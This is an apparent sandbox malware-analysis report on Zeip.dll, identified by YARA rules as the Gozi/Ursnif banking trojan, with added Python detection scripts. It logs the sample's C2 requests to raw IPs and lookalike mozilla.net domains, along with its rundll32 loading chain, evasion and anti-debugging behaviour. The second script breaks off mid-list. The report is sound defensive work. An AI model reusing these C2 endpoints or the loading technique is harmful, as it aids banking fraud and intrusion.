Source: global traffic | HTTP traffic detected: GET /fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 80.77.25.109 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 170.130.165.182 | Connection: Keep-Alive | Cache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR
Source: loaddll32.exe, 00000000.00000002.273024617.000000000154B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match | File source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04B96EB4 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_04B96EB4

      System Summary

      barindex
      Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_fd494041, Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_261f5ac5, Author: unknown
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: Zeip.dll, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Matched rule: Windows_Trojan_Gozi_fd494041 (reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23)
Matched rule: Windows_Trojan_Gozi_261f5ac5 (reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23)
Both rules matched in each of the following sources:
Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00402344
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00401E2A
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B94CAB
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B939B3
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B92FED
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B983CC
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_0040154A GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_004015F2 NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00401C21 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00402565 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B96940 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B985F1 NtQueryVirtualMemory
Source: Zeip.dll, Binary or memory string: OriginalFilenameuild_era_epmh.dllF vs Zeip.dll
Source: Zeip.dll, Virustotal: Detection: 31%
Source: Zeip.dll, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Zeip.dll"
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 416
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 444
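The chain above (loaddll32.exe starting cmd.exe, which starts rundll32.exe with "C:\Users\user\Desktop\Zeip.dll",#1) is the sandbox's own harness loading the DLL, but the shape it produces, rundll32.exe loading a DLL from a user-writable path by ordinal export and then resolving names and opening sockets, is exactly what an endpoint detection keys on. The script below is an added example, not from the report or from Joe Sandbox; it parses lines in the report's own format (constructed copies of the entries above and of the network entries later on this page) and flags that pattern. The SCRIPT_HOSTS parent list is my choice of interesting parents, and loaddll32.exe is in it only because that is how this report launched the sample.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample: the process-creation, network-connect and domain-query
# lines attributed to this sample in the report, in the form the report
# prints them (parent and event type run together, no separator).
SAMPLE_LINES = [
    r'Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Zeip.dll"',
    r'Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1',
    r'Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1',
    r'Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 170.130.165.182 80',
    r'Source: C:\Windows\SysWOW64\rundll32.exeDomain query: trackingg-protectioon.cdn4.mozilla.net',
    r'Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408',
]

# Both patterns accept the fused form above and a "parent, Process created:" form.
PROC_RE = re.compile(r"^Source:\s*(?P<parent>.*?),?\s*Process created:\s*(?P<image>\S+)\s+(?P<cmd>.*)$")
NET_RE = re.compile(r"^Source:\s*(?P<proc>.*?),?\s*(?P<kind>Network Connect|Domain query):\s*(?P<target>.+)$")
# rundll32.exe <dll>,<export>   (quoted or unquoted DLL path; "#n" is an ordinal)
RUNDLL32_RE = re.compile(r'rundll32\.exe\s+"?(?P<dll>[^",]+)"?\s*,\s*(?P<export>\S+)', re.IGNORECASE)
USER_PROFILE_RE = re.compile(r"^[a-z]:\\users\\", re.IGNORECASE)
# Parents worth flagging when they spawn rundll32.exe (my choice; loaddll32.exe
# only because it is the sandbox loader used in this report).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "loaddll32.exe"}


def basename(path):
    return PureWindowsPath(path).name.lower()


def inspect_process(parent, image, cmd):
    """Reasons a process-creation event is suspicious; empty list if none."""
    reasons = []
    m = RUNDLL32_RE.search(cmd)
    if not m:
        return reasons
    dll, export = m["dll"], m["export"]
    if USER_PROFILE_RE.match(dll):
        reasons.append(f"DLL loaded from a user-profile path: {dll}")
    if export.startswith("#"):
        reasons.append(f"export referenced by ordinal rather than name: {export}")
    if basename(image) == "rundll32.exe" and basename(parent) in SCRIPT_HOSTS:
        reasons.append(f"rundll32.exe spawned by {basename(parent)}")
    return reasons


def analyze(lines):
    """Scan report lines; return one finding per suspicious line."""
    findings = []
    for n, line in enumerate(lines, 1):
        pm = PROC_RE.match(line)
        if pm:
            reasons = inspect_process(pm["parent"], pm["image"], pm["cmd"])
            if reasons:
                findings.append({"line": n, "process": basename(pm["image"]), "reasons": reasons})
            continue
        nm = NET_RE.match(line)
        if nm and basename(nm["proc"]) == "rundll32.exe":
            # rundll32.exe itself has no reason to resolve names or open sockets
            findings.append({"line": n, "process": "rundll32.exe",
                             "reasons": [f"{nm['kind']} from rundll32.exe: {nm['target']}"]})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES):
        print(f"line {f['line']} ({f['process']}):")
        for r in f["reasons"]:
            print("  -", r)
```

On a real endpoint the same three conditions map onto process-creation telemetry (image, parent image, command line) and DNS/network events keyed by process; the combination of a user-profile DLL, an ordinal export and outbound traffic from rundll32.exe is a far better signal than any one of them alone, since legitimate rundll32.exe invocations normally load a system DLL by a named export and stay offline.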
Source: C:\Windows\SysWOW64\rundll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\WerFault.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2407.tmp
Source: classification engine, Classification label: mal100.troj.evad.winDLL@9/12@4/3
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B928F6 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5308
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe, File read: C:\Windows\System32\drivers\etc\hosts (2 times)
Source: C:\Windows\SysWOW64\WerFault.exe, File read: C:\Windows\System32\drivers\etc\hosts (4 times)
Source: Zeip.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ZR@4Hk*7L7H|SDs!u.pdb, source: loaddll32.exe, 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmp, Zeip.dll
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_004022E0 push ecx; ret 3_2_004022E9
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00402333 push ecx; ret 3_2_00402343
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B9B859 push 0000006Fh; retf 3_2_04B9B85C
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B983BB push ecx; ret 3_2_04B983CB
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B97FD0 push ecx; ret 3_2_04B97FD9
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00401385 LoadLibraryA,GetProcAddress

Hooking and other Techniques for Hiding and Protection

Source: Yara match, File source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX (9 times)
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (3 times)
Source: C:\Windows\SysWOW64\WerFault.exe, Process information set: NOOPENFILEERRORBOX (57 times)

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe, Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1676, Thread sleep time: -1773297476s >= -30000s
Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe, Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe, Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00401385 LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\loaddll32.exe, Process queried: DebugPort (2 times)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 170.130.165.182 80
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: trackingg-protectioon.cdn4.mozilla.net
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 80.77.23.77 80
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 80.77.25.109 80
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: protectioon.cdn4.mozilla.net
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00401C21 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B91F55 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00402133 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_00401BA8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04B91F55 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

Stealing of Sensitive Information

Source: Yara match, File source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR
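Every Yara hit above names the same memory region: the identifiers differ only in their third field (a sequence number), all carry base address 0000000005108000 and process index 00000003, and one of them has 00000002 in the second field together with the highest sequence number. The URL table further down pairs process index 3 with rundll32.exe, and the last hit names rundll32.exe PID 5412 outright. The added example below is editor's code, not part of the Joe Sandbox report: it parses those identifiers and collapses them into one record per (process, base address), so that nine Yara lines read as one finding, an Ursnif payload resident in memory of rundll32.exe rather than on disk. The field layout it decodes (field 5 as the page protection, field 7 as the MEM_* region type, kind 2 as the end-of-process dump and kind 3 as an in-flight snapshot) is an assumption about Joe Sandbox's naming scheme that this page does not document; the PAGE_* and MEM_* constant values themselves are the ones from winnt.h.

```python
import re
from collections import defaultdict

# Windows memory constants from winnt.h (the values themselves are certain).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Identifier shape exactly as it appears on this page:
#   <proc>.<kind>.<seq>.<base>.<f5>.<f6>.<f7>.<f8>.sdmp
DUMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<kind>[0-9a-f]{8})\.(?P<seq>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<f5>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\.(?P<f7>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


def parse_dump_name(name):
    """Split one dump identifier into its fields.

    Assumptions (not documented on the page): field 5 holds the region's page
    protection and field 7 its MEM_* type; kind 2 is the end-of-process dump and
    kind 3 an in-flight snapshot. Values outside the tables stay as hex strings."""
    m = DUMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name}")
    protect = int(m["f5"], 16)
    region_type = int(m["f7"], 16)
    return {
        "process_index": int(m["proc"], 16),
        "kind": int(m["kind"], 16),
        "sequence": int(m["seq"]),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "region_type": MEM_TYPE.get(region_type, hex(region_type)),
    }


def summarize_regions(names):
    """Collapse per-snapshot hits into one record per (process index, base address)."""
    groups = defaultdict(list)
    for name in names:
        d = parse_dump_name(name)
        groups[(d["process_index"], d["base"])].append(d)
    summary = []
    for (proc, base), dumps in sorted(groups.items()):
        dumps.sort(key=lambda d: d["sequence"])
        summary.append({
            "process_index": proc,
            "base": base,
            "snapshots": len(dumps),
            "kinds": sorted({d["kind"] for d in dumps}),
            "protect": dumps[0]["protect"],
            "region_type": dumps[0]["region_type"],
            "first_sequence": dumps[0]["sequence"],
            "last_sequence": dumps[-1]["sequence"],
        })
    return summary


# The nine Yara-hit dumps listed on this page under "Remote Access Functionality".
YARA_HIT_DUMPS = [
    "00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
    "00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
    "00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
    "00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
    "00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
    "00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp",
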